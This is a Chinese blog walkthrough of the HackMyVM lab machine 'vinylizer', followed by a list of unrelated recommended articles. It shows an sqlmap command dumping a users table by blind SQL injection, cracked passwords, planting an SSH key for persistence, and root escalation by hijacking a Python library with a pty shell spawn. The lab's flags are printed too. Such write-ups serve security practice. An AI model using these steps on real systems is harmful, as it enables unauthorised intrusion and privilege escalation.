vinylizer - hackmyvm

最新推荐文章于 2024-05-22 18:37:26 发布
最新推荐文章于 2024-05-22 18:37:26 发布
阅读量143 收藏 1
点赞数 8
分类专栏: hackmyvm 文章标签: 安全 linux 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/138294768
版权

简介

靶机名称:vinylizer

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=vinylizer

本地环境

虚拟机:vitual box

靶场IP(vinylizer):192.168.56.110

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

zenmap随便扫下

nmap -p 1-65535 -T4 -A -v 192.168.56.110/32

image-20240428212920080

22和80端口

http

唱片商场网页

image-20240428213033501

sql注入

可以看到有一个登录界面

image-20240428220941035

sqlmap一把梭。因为是时间盲注,所以可以把注入时间用--time-sec调短一点。要等很长时间……

python3 sqlmap.py -u "http://192.168.56.110/login.php" --data "login=&password=123&username=" -D  vinyl_marketplace -T users --dump-all  --risk 1 --time-sec 1

image-20240428222622406

[22:25:57] [INFO] 将哈希值写入临时文件 '/tmp/sqlmapqaim85il26926/sqlmaphashes-j41heunl.txt'
n
Database: vinyl_marketplace
Table: users
[2 entries]
+----+----------------------------------+-----------+----------------+
| id | password                         | username  | login_attempts |
+----+----------------------------------+-----------+----------------+
| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |
| 2  | password123                      | lana      | 0              |
+----+----------------------------------+-----------+----------------+

hashcat配合kali字典成功爆出来shopadmin的密码为addicted2vinyl

image-20240428222956810

当然还有一种做法是cmd5爆米()

image-20240428223044408

使用该密码后成功用ssh登录目标服务器

image-20240428223500050

I_L0V3_V1NYL5

提权

先把公钥写进靶机ssh,方便后期连接

shopadmin@vinylizer:~$ cd .ssh
shopadmin@vinylizer:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClvG6svC2GWmvvZyP2dF1aWWsyDEfwoSCkaleG/VK38Dpzu4agS5FGrkZa2bnebp8LB1mdwEyUr8eq1RcApIDn8jhVaShDNj9EffzzCQWWnJ/1pEXJqmhgjkUvW5LngLTyrsAL2y4ko/zSNY4mebJxnfDc/COjl4u5Rh3PoV0GktC3b+9q4b3InVYjfTVrX77zi30zFhrmYT+0xpjfc1PUFmAqXiLx/zfDBTBAgOTrRZ098XZA63YsLV1YCQxc9iyIjyqJUjXD5lq70oMbub264BREBTFILmdLJQjVwctr/NdDn9TIeFLNBDXZzCGkpqCBUG4+VaqXL/gpQUCb/cJj0UMJBmRXfS0ltt1cWUlYkUb34hlSSrnbtdFkZYfkoZnrrQvJw86pMSO5HJah7XnZUlXQ7w47tloh/u6EW+zo0Q96wQ+SvHRE+XnhgKjQhpmcGWkU0Kw9u34MKS8T3g1uptopuHpa/XhBLah7poRtAtJsDDbVjcxlIW6XS2HT61s= root@koishi-reverse" >> authorized_keys

sudo - l,看到利用点

shopadmin@vinylizer:~/.ssh$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User shopadmin may run the following commands on vinylizer:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py

这个脚本本身没啥利用,所以从它所使用的库文件入手

image-20240428230756950

这里选择random库进行攻击,直接写入shell

import pty;pty.spawn("/bin/bash");exit()

然后执行命令,成功提权

image-20240428231437573

4UD10PH1L3

古明地核
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 6031
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
最新发布
oray2013的专栏
05-22 223
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
保障餐饮场所安全:可燃气体报警器专业检测的必要性
BDjiance的博客
05-21 273
可燃气体报警器是一种用于监测空气中可燃气体浓度的设备,一旦检测到可燃气体浓度超过设定的安全范围,就会发出警报,提醒人们及时采取措施,避免火灾事故的发生。在日常经营中,餐饮场所也应当加强对可燃气体报警器的日常维护和保养,定期清洁和检查,确保其在平时的使用中处于良好的状态。其次,定期检测也可以校准报警器的灵敏度,确保其能够及时、准确地检测到可燃气体的泄漏情况,提供更可靠的安全保障。综上所述,餐饮场所应当认真对待可燃气体报警器的专业检测周期,选择正规的专业机构进行检测和校准,保障其安全可靠。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 997
然后再针对这个画一个块内部图,然后这里再把签名拖上去
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 415
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
服务器漏洞安全修复记录
lxw1844912514的博客
05-22 311
Redis中线上使用keys *命令是非常危险的,应该禁用或者限制使用这些危险的命令,可降低Redis写入文件漏洞的入侵风险。描述:设置密码失效时间,强制定期修改密码,减少密码被泄漏和猜测风险,使用非密码登陆方式(如密钥对)请忽略此项。例如,在一个简单的 bash 脚本中,你可以检查用户输入的命令,如果是。重命名为一个难以猜测的命令,以此来减少恶意用户利用默认命令执行未授权操作的风险。但是,需要注意的是,Redis 并没有提供完全禁用命令的机制。命令,你可以考虑修改 Redis 源代码,从源头上移除。
大坝安全位测设备:位移监测站
thhj3312的博客
05-20 860
TH-WY1大坝安全位移监测设备是用于监测水库大坝位移变化的设备,旨在确保大坝的安全运行。总的来说,大坝安全位移监测设备是大坝安全管理的重要组成部分,通过实时、准确的监测数据,可以确保大坝的安全运行,减少潜在的安全风险。
F5发布2024年5月季度安全通告
2401_84434570的博客
05-22 1137
F5 BIG-IP Next Central Manager OData注入漏洞。F5 BIG-IP Next Central Manager SQL注入漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP Next Central Manager中间人攻击漏洞。F5 BIG-IP APM浏览器网络访问VPN客户端来源验证错误漏洞。F5 BIG-IP Next CNF信息泄露漏洞。F5 BIG-IP配置实用程序跨站脚本漏洞。
RSA与AES:打造高效且超安全的混合加密方案
那仰望的人,心底的孤独和叹息
05-19 518
RSA结合AES混合加密,实现加密账号密码等,工具类代码。 RSA是**非对称加密**的一种,具有两个密钥:公共密钥和私有密钥。公钥和私钥是一对,公钥加密后的内容只有私钥才能解密。两个密钥的不同,所以是非对称的。
【安全产品】基于HFish的MySQL蜜罐溯源实验记录
uuzeray的博客
05-22 322
可以看到成功连上蜜罐的3306服务,但进行查询后会直接lost connection,属于低交互。攻击者的mysql客户端版本为5.7(要求低于8.0)当然修改配置文件后也可以读/etc/passwd。用HFish在3306端口部署MySQL蜜罐。此时HFish已经成功读到攻击者本地文件。MySQL蜜罐对攻击者机器任意文件读取。
敏感数据处理的艺术:安全高效的数据提取实践与挑战
weixin_44835050的博客
05-22 303
在数字化时代,数据已成为驱动经济社会发展的核心要素之一。然而,伴随数据量的爆炸性增长,敏感数据的管理和保护成为了信息安全领域的重大挑战。敏感数据,包括个人身份信息、财务记录、健康档案、商业秘密等,一旦泄露,将对个人隐私、企业利益乃至国家安全构成严重威胁。因此,如何在确保安全的前提下高效地进行敏感数据提取,成为了一个亟待解决的问题。
《安富莱嵌入式周报》第337期:超高性能信号量测量,协议分析的开源工具且核心算法开源,工业安全应用的双通道数字I/O模组,低成本脑机接口,开源音频合成器
Simon223的博客
05-22 987
《安富莱嵌入式周报》第337期:超高性能信号量测量,协议分析的开源工具且核心算法开源,工业安全应用的双通道数字I/O模组,低成本脑机接口,开源音频合成器
毫米波雷达模块在智能家居安全系统中的关键技术分析
MinewSemi2022的博客
05-22 333
毫米波雷达技术是一种利用毫米波进行无线通信和感知的技术,其工作原理是通过发送和接收毫米波信号,然后分析信号的反射、散射等信息,从而实现对目标物体的探测和跟踪。毫米波雷达技术作为智能家居安全系统中的关键技术之一,其应用已经取得了一定的成就,并且在未来有着广阔的发展前景。毫米波雷达模块推荐使用MS72SF1,这是一款60G的毫米波雷达模块,相对于传统视觉、红外、激光等感知手段,毫米波雷达不受光照影响,能够全天时实现无感主动对室内人员感知监测,且具有个人隐私保护功能,是目前家居场景应用最佳传感器。
第86天:代码审计-PHP项目&TP框架&安全写法&1day利用&0day分析
weixin_71529930的博客
05-19 180
这里的利用条件是必须有find方法,并且where后面的参数是数组。去查找find方法,查出来的结果里,选择的文件也最好是非官方的文件。发送到repeater,然后把poc包进行一个简单的修改。找触发入口,找个页面看页面时如何触发访问的。很明显这是登录的代码,所以登录抓包。首先先查询thinkphp的版本。查找database()利用poc进行报错注入。
行车安全:UWB模块的智能化在车辆安全系统中的作用
MinewSemi2022的博客
05-22 395
随着技术的不断创新和应用的推广,相信UWB模块在车辆安全系统中的应用将会越来越广泛和成熟,为人们的出行提供更加安全、便捷的保障。随着车辆安全技术的不断创新和应用的推广,UWB模块在车辆安全系统中的应用前景十分广阔。未来,随着技术的进一步成熟和应用的扩大,相信UWB模块将会为车辆安全技术的发展注入新的活力和动力,为车辆行车安全性提供更加可靠和智能的技术支持。车辆定位:UWB模块可以实现对车辆位置的高精度定位和跟踪,为车辆导航和行驶提供精准的位置信息,提高车辆行驶的安全性和稳定性。
分支机构多,如何确保文件跨域传输安全可控?
weixin_44264342的博客
05-22 370
FileLink跨网文件交换系统通过安全、可靠、高效的技术手段,解决了跨域文件传输中的诸多问题,为企业和机构提供了一个安全可控的文件传输解决方案。未来,随着技术的不断发展和完善,FileLink系统将持续优化,满足更多行业和应用场景的需求。
暴力破解及验证码安全
XLbb的博客
05-20 1313
网站是否双因素认证、Token值等等 用抓包工具查看是否有token值;双因素认证查看登录是的需要验证码; 可以尝试用sqlmap工具检测查看是否有注入点;基于Token破解 由于token值输出在前端源代码中,容易被获取,因此也就失去了防暴力破解的意义,一般Token在防止CSRF上会有比较好的功效。
佩戴安全头盔监测识别摄像机
bova2022的博客
05-20 467
此外,佩戴安全头盔监测识别摄像机还可以记录佩戴头盔的工人数量、频率和时间,提供详细的数据报表和统计分析。然而,在使用过程中,我们也需要注意保护员工的隐私和个人信息安全,加强数据的保护和管理,在促进工作场所安全的同时,也保障员工的合法权益。在工程施工现场,如果有工人没有佩戴安全头盔,监测识别摄像机会立即发出警报,以便相关人员及时采取措施,确保工作场所的安全。佩戴安全头盔是重要的安全措施,尤其在工地、建筑工程和工业生产等领域,安全头盔的佩戴对于工人的生命安全至关重要。
将金融文件转化为ASP.NET Core C#中的智能且安全的表单
励志做最业余的专业博主,控件产品可以私我~
05-22 887
本文介绍如何在 ASP.NET Core C# 中将财务文档转换为智能且安全的表单。本文解释了从预填充表单字段到数字签名的所有必要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值